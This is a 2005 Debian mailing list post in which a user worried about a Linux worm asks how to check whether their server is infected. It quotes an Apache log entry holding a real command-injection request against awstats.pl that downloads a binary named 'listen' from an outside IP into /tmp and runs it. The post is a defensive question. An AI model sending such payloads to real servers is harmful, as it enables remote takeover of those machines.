Re: New Linux worm crawls the web
From: [KS] (lists04_at_fastmail.fm)
Date: 11/09/05
- Previous message: Eriberto: "Re: OpenOffice 2 on Sarge?"
- In reply to: Hugo Vanwoerkom: "Re: New Linux worm crawls the web"
- Next in thread: Paul Johnson: "Re: New Linux worm crawls the web"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Date: Wed, 09 Nov 2005 10:10:50 -0500 To: debian-user@lists.debian.org
Hugo Vanwoerkom wrote:
> Mike McCarty wrote:
>
>> http://www.securityfocus.com/brief/38?ref=rss
>>
>>
>
> How to detect whether infection has occurred?
>
> H
>
>
I got the following log in my apache access.log which I'm concerned about:
208.234.0.44 - - [08/Nov/2005:10:01:03 -0500] "GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 200 780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
This was the only log which gave the client a 200 reply. I didn't find
anything on my /tmp and nothing was listening to the UDP ports 7111 or
7222. My awstats version is 6.4-2 which people say should be patched up
to be unvulnerable to this attack.
How do I make sure that my machine is not infected and serving someone
else now?
Thanks,
/KS
-- To UNSUBSCRIBE, email to debian-user-REQUEST@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
- Previous message: Eriberto: "Re: OpenOffice 2 on Sarge?"
- In reply to: Hugo Vanwoerkom: "Re: New Linux worm crawls the web"
- Next in thread: Paul Johnson: "Re: New Linux worm crawls the web"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
